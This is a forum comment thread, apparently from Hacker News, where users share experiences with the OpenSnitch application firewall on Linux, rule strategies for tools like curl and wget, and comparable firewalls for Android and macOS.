I've tried to use it extensively (as an interactive firewall). However there are just some problems (that are not the fault of OpenSnitch) that I'm not even sure that are even solvable.
For example, supposed I run `curl` on the terminal, I can either always decide on a case-by-case basis to allow it thru, or I'm required to whitelist it permanently.
Once I've whitelisted generic tools like `curl` or `wget`, then the floodgates are really open, since any malware that have compromised my machine can just use `curl` or `wget` to get to the internet without hitting the firewall.
I’ve found that by using subdomain wildcards and/or subnets, I build up a stable set of rules pretty quickly and then only have to review requests to new endpoints once in awhile.
To me, the peace of mind knowing that I’ll be prompted to allow new access is worth the initial hassle. And once the habit is built, it’s pretty easy to manage.
Editing to add: I also use expiring rules regularly. Maybe I trust an installer and want to let it do its thing. So I open it up with a rule for the executable expiring in the near future (options include: forever, until reboot, for the next 30s, for the next 5 mins, etc). This can drastically simplify some tasks if there are a large number of endpoints for some reason and avoids leaving a hole open permanently.
Sounds like that varies widely by person/use case. I’ve been using this software for a couple years at this point. I don’t have to update rules all that often (usually a few rules/week), and when I do, it’s usually a 10-30 second detour. The only time it takes more work is if I don’t know why something is trying to connect. But that’s exactly the scenario I’m targeting, i.e. calling attention to the weird looking connections.
My use cases are general productivity, development on side projects and a variety of software experiments, gaming, and some local AI stuff.
I also don’t see this as a ton of work. Rules are 99% pre-configured for you and all you have to do is choose the scope and duration of the rule and whether to reject or allow.
I’ll admit it’s annoying once in awhile if there’s a major update to software that spawns a bunch of new rules, but once I get past the feeling of being annoyed, it’s really an extremely simple and quick process.
Really have to emphasize the habit creation part. After I stuck with it for a few weeks, it became second nature and I stopped getting annoyed for the most part. I consider this a worthwhile habit to build if you’re trying lots of code/libraries and want to know what’s phoning where.
In terms of time spent, that amounts to about one minute per week for me right now. Sometimes less.
The user experience is streamlined, and adding rules involves responding to a dialog that automatically pops up when a connection is attempted. UX is key here and this would be a very different story if you had to go into a separate rule management interface every time.
Regarding paranoia, I don’t see it that way. Supply chain attacks are alive and well, and if you’re running other people’s code on a regular basis, this is a low cost precautionary measure. I totally recognize that not everyone has the same risk profile or tolerance.
Generally I don't get many prompts day to day, if I do it's because something has changed or I'm using a new application and I find it comforting to know what's going on.
You can make rules based on host, process arguments, etc so it's pretty flexible for allowing stuff you consider safe and staying out the way.
Long ago I used zonealarm on windows and it's a pretty similar ux to that.
I still use firejail or docker for anything that might be sketchy, but it's been super interesting seeing what trusted applications are doing. For example I was a bit shocked that the gnome calculator app was making network requests but it turned out it was for currency exchange rates.
I have found it makes me less paranoid, which is good.
In using it for a while, I have only found a few pieces of software trying to access places I don't expect and don't approve of (quite a few more that I do expect, but don't approve of). And none of them seemed to be actively malicious, just misbehaved or poorly configured.
Genuinely curious: how/why does that seem too often? I truly don’t understand. Have you seen the user experience and what’s involved?
How do you feel about other common permission prompts, e.g. location, microphone, camera, share your screen, run as privileged user, etc? I appreciate being asked about those things and I put this in a similar category.
> Genuinely curious: how/why does that seem too often?
I want to work, not manage my work station.
I don't mind configuring things, my dotfiles are the product of 25 years of tweaking. But having to tweak anything multiple times per day is not going to help me work, it is going to hinder my work.
Worth a shot! The first few days are by far the worst while all of the existing connections are accounted for, but things calm down quickly.
One thing I wished I knew sooner was that the square [+] button on the rule dialog opens more fields on the form for editing.
This makes it super easy to create a single wildcard rule e.g. when timesyncd tries to hit an ntp server for the first time, I expand the autogenerated rule that pops up to include all subdomains like *.ntp.domain.tld so I don’t have to keep creating rules for the other ntp servers. I’ve gotten more efficient over time this way.
Might be the same but what if you allow all curl/wget traffic for 'dev' user, but continue to flag any traffic for 'normal' user
for dev work run 'su -c curl … dev'
But if malicious program in normal user space is running, then app firewall flags curl and wget use appropriately.
It would be annoying to input password every time so maybe setup PAM to use yubikey or biometric? Also make sure this user cannot login and does not have a password.
This sounds rather silly. If this is really a concern, then "curl" or "wget" can be renamed. I use an application level firewall on mobile and I do not "whitelist" names of programs, I "whitelist" access to certain domain names/IP addresses by certain programs.
The easiest way to stop programs/malware from phoning home IME is to deny access to DNS. I have been doing this for decades and it still works flawlessly. "99%" of the time programs/malware that phone home rely on DNS, not "hard-coded" IP addresses. And it is quite easy for me to detect the rare case of a program/malware that does not need DNS.
With DNS I "whitelist" certain domain names. In fact today I do not even use a locally-served zone file with the IP addresses I need (the whitelist); a forward proxy handles the domain to IP address mapping, the whitelist loaded by the proxy is a text file, like a zone file but simpler.
I wonder if there's a way to configure it so that when the parent cmd is a trusted command (say, a bash/zsh owned by the user), it could let the curl command through and otherwise block it. But yeah, that seems like a bit of a hassle.
The bash command line wouldn't be the same as the one launched by your terminal, though. But yes, I’m sure there are myriad exploits around something like that.
What could work instead is something where you run a command like `opensnitch-context dev` and it would talk to the running daemon to do proper authentication ("do you want to allow this context to be used?") and then hopefully some other magic (cgroups?) to know if the processes are part of that context even if they are sparse/nested child processes.
> However there are just some problems (that are not the fault of OpenSnitch) that I'm not even sure that are even solvable.
Those problems are solvable. Some "big" EDRs, which happen to work in a similar way, allow to declare the parent/child relationship of the executables to block, i.e. it should be possible to declare that if "curl" is spawned, and if by walking the parent list we encounter a process called "/usr/bin/trusted", then allow this curl invocation. This action would allow running "curl" from bash scripts, as long as the bash script has "/usr/bin/trusted" as a parent.
Or be ok with filtering HTTP/TLS traffic based on the domain only, as that part isn't encrypted (the SNI [Server Name Indication]). OpenSnitch should be able to allow/disallow based on that, rather than having to decrypt the TLS part.
But still, you can probably correlate DNS requests with connections to IP addresses in many cases. Although if the program uses DNS over HTTPS (DoH) like several programs do now then the DNS record is also not known.
a sudo like wrapper for this could be pretty cool.
still will capture when processes unexpectedly try to connect to the network for the first time and there is some value in that. even if the popups aren't great.
I switched from Qubes OS to Fedora+Flatpak+Opensnitch. Couldn't make it to run Wayland on my hybrid GPU system (Nvidia). QubesOS drained battery very quickly and since graphics is afaik software rendered, I've gotten into problems in watching HD videos (e. g. a lot of dropped frames on Youtube).
> It doesn’t pin to PID? What if I rename a program to something that has been whitelisted?
That's a valid question. It should allow/disallow executables by hashing the executable file (not even the device id + inode), not by comparing the paths. Also pinning the PID also isn't good, since pid is temporary.
It's the filter configured per user, or is it system-wide? I know you can filter per-user with IP tables and whatever the newer one is, but I haven't dug that deep into open snitch. Maybe a single trusted user account without a login that you could su into? I wonder if you could also whitelist a VM process and spin up single-use VM sandboxes to use when you want to do a bunch of work like that.
Definitely a minor hassle to set up compared to just saying yes or no to permissions, but it's not complicated, if it works.
This is what finally got me over to NixOS. In the past when I've used application firewalls its a lot of set up that often breaks on updates changing paths or I have to redo it all whenever I move to a new computer. Just tons and tons of churn and wasted effort.
By integrating with the package manager that hasn't been an issue. Once I got through the initial work of setting up my whitelists I just have a little bit of effort each time I add a new package to my nix configs. If I don't want to take on the effort of adding a whitelist to my nix config, I can just add a temporary whitelist that lasts until the next reboot.
It was a steep learning curve and a lot of work, but now its a breeze to maintain.
I tend to put all the random grab bags rules needed for basic functionality in the opensnitch.nix module. If a package needed rules it gets a module and they go in there. Check the signal.nix module for a good example
This is great for catching sloppy apps that make an excessive number of connections. Thunderbird, I’m looking at you.
I like it, but it has a small annoyance in that the temporary rules that have expired don’t get deleted or marked in the interface. So I have to restart the gui once in a while to clear them.
Actually the new Thunderbird people are not taking lots of patches and fixes for even things like security and mail corruption issues. And privacy definitely doesn't seem to be anything they are interested in. I gave up and just send them over to Betterbird, which is what I use now anyway, since I don't want my mail corrupted.
As was mentioned in the thread you linked, use 'baseurl' instead of 'metalink' in the repo definitions (in /etc/yum.repos.d) and set the update server to whichever mirror you like.
There's even a helpful example in each Fedora repo that you can use as a template.
My original reply was: I guess it sucks to be you then.
Which isn't very nice or helpful. So I considered mentioning (again) that there are examples that just need to be un-commented and the example url replaced. Which is perhaps a half-dozen keystrokes per file, or maybe a dozen to replace them all at once. As such, if you are, in fact, that lazy, I guess it really does suck to be you.
Hosting your own private mirror[0] is also an option. But then, you'd need a couple dozen more keystrokes (and maybe ten or fifteen minutes of set up), so I'm guessing that's a no go either.
I suppose you could, alternatively, add all the mirrors near you (by your own estimation) to an OpenSnitch allow list and you wouldn't have to change the repo definitions at all. DNF with metalinks will attempt to connect to additional mirrors until it can complete the current request.
That said, I'm guessing setting that up is much more work than deleting, then adding a '#' character (uncomment the baseurl and comment out the metalink) and replacing a URL (the mirror you wish to use).
And since you're that lazy, I imagine that's a no go too.
[This isn't really relevant and I should probably remove it, but I kind of like it there. And you're welcome]
I'd further add that your 'complaint' is an idiotic one at that. So you're lazy and dumb. Good combination friend.
[End not relevant but not deleted text.]
As I mentioned previously, although this time I'm being more expansive in my admonition: Good luck. It seems like you're gonna need it.
The point is that Mint does this with two clicks. Fedora and OpenSnitch are a bad combination due to a poor design and no docs. I was hoping someone will know a trick get fedora mirrors under control.
I have heard good things about this one. But i think this one of those no root firewalls that uses the vpn, so I figure this means I can't use a VPN at the same time.
An alternative android root only option is afwall+ which allows blocking on lte, WiFi, lan, and VPN separately, and script access to iptables. Not sure how actively developed it is, but it seems to work ok.
*edit: Seems to still be active, open source, and available on fdroid too.
Netguard is fantastic, although it takes a while to get a safe setup working. I'm blocking traffic by default and get to see all the blocked connection attempts - the extent to which apps transmit data to various parties is depressing. Netguard should be a standard OS feature.
I didn't want to pay without testing the features first, so I have rebuilt the app (it is opensource) with Pro enabled, so I guess that's an option if you want to avoid payment. Updates are a problem then though. Once I tested it I gladly paid (more than requested) to support the development. I never got around to reinstalling it though, so I'm still on an older version.
NetGuard is simply awesome. The piece of mind when I know which servers the apps are contacting, and being able to block their access to the net by default, is just great. The rules could be made a bit more easily adjustable (it would be nice if I could block `*.firebaseinstallations.googleapis.com` everywhere, even if other traffic is allowed for the app), but I'm just nitpicking now. Highly recommend it.
"You can get all current and future NetGuard pro features (including updates) without Google Play services for the GitHub or F-Droid version by a one time donation of € 0.10 or more. If you donate 7 euros or more, you can activate the pro features on all Android devices you personally own, else you can activate the pro features one time only."
Sadly all real firewalls need root. I was using AFWall+ for a long time it has neat controls for every app to allow or deny Wifi, Cell or LAN (if you have). It is a iptables/nftables frontend so you can customize the rules to your heart's content: https://github.com/ukanth/afwall
Works from Android 2+
Without root only VPN solutions like Adguard are available.
EDIT: if you want neat stats: Glasswire has an Android version. I have only used the beta so I have no idea about its current state. Might be worth checking out though.
I thought parts of the Android OS can by-pass the VPN so the firewall becomes ineffective against blocking Google, OEMs, and others that have root. Wouldn't the VPN API being used as a firewall also prevent one to use a VPN client at the same time?
> In my experience the "block all non VPN traffic" options in Android don't work reliably. iptables does however.
Both (iptables/nftables and VPN APIs) have to be enforced by the Linux Kernel, which is subject to the same "Androidisms", if that makes sense.
root, in fact, opens up a gaping hole in that, it totally compromises Android's security model. IMO, it isn't worth to root Android just to run iptables (just because it seems like iptables is what makes a firewall).
IMHO Android's security model is incredibly flawed anyways. I don't even need root to access stuff I shouldn't have access to on my Mediatek based phone because the firmware has tons of gaping security holes anyways.
I think device you don't have root on isn't really yours and should be treated as a lease.
But you are right, when Wifi/Data is on at boot even the -tables might not get updated fast enough so stuff might get through.
I really like Rethink DNS.
I have learned many things from watching it (such as I think Signal is compromised by some five-eyes "crossing the border" fuckery.)
I agree with the first sentence. I cannot even begin to comprehend what semantics you were trying to convey with the second sentence however. I am also lacking all context to be able to understand (compromised in what sense, by whom and to what degree? which border? what is "fuckery" defined as?).
I appreciate you trying to add to the discussion but in this case you leave me with way more questions than I started out with which I personally perceive as an unwanted mental overhead.
What I mean is by watching the IPs, I see a lot of cross-border ingress/egress when it shouldn't be necessary. It's not proof, but an indicator of probability to me, that echelon style mechanisms are being used.
If you are unaware of echelon and related programs, essentially, since it's illegal for the US (officially at least) to spy on it's own citizens without a warrant, instead they let an "ally" country like the UK spy on Americans and then "share the data", essentially another abuse of third party doctrine.
OpenSnitch prompts you when there's network activity. So if random app makes a telemetry call or something, you get the option to white/greylist that connection with granularity, like OK to make a connection to that address from this executable etc, or always OK to this address, and with duration options like once/for 15 seconds, until reboot etc. Once you get over the hurdle of whitelisting the apps you use and trust, it's actually pretty nice and gives you good insight into what your apps/games are doing you otherwise wouldn't have known about.
Is there any plan to port this to MacOS? I use Little Snitch (which this is obviously influenced by) for a while, but really prefer open source (for reasons unrelated to payment).
Yes. Default deny application firewalls are really powerful tool. It really can take the wind out of large classes of exploits. They can't phone home to exfil data or get follow up command.
It isn't something I'd recommend for everyone, because it is a lot of work and faffing around, but be extremely effective if you are willing to invest in managing it correctly.
Little snitch, the macos equivalent to this was the recommended way to stop pirated copies of Adobe CS programs phoning home for years. Don't think that's the kind of issue you meant, but it does solve it.
Researching every connection is painstaking at first across various operating systems but a tool like this really helps you get familiar with what is normal and what is not.
There's Lulu based on Apple's Network Extension framework but there are quite a few issues with the framework itself (it will briefly initiate a connection even though there's a deny rule for that address etc).
I tried LuLu and it was okay but I did end up trying and subsequently buying Little Snitch. The level
of UX polish wasn’t quite there for me with LuLu.
I also feel the same way re: UX polish. I haven't bought little snitch yet, but was kind of wondering if I even needed to. I've already got a pihole on my tailnet that blocks a fair amount of things, and then ublock origin on firefox to boot. If LS were only like $20 I'd probably just buy it for the pleasing graphs, but otherwise I'm not sure what extra value it adds. There's probably a usecase for it given the other things I have, but perhaps I'm not the target audience.
For example, supposed I run `curl` on the terminal, I can either always decide on a case-by-case basis to allow it thru, or I'm required to whitelist it permanently. Once I've whitelisted generic tools like `curl` or `wget`, then the floodgates are really open, since any malware that have compromised my machine can just use `curl` or `wget` to get to the internet without hitting the firewall.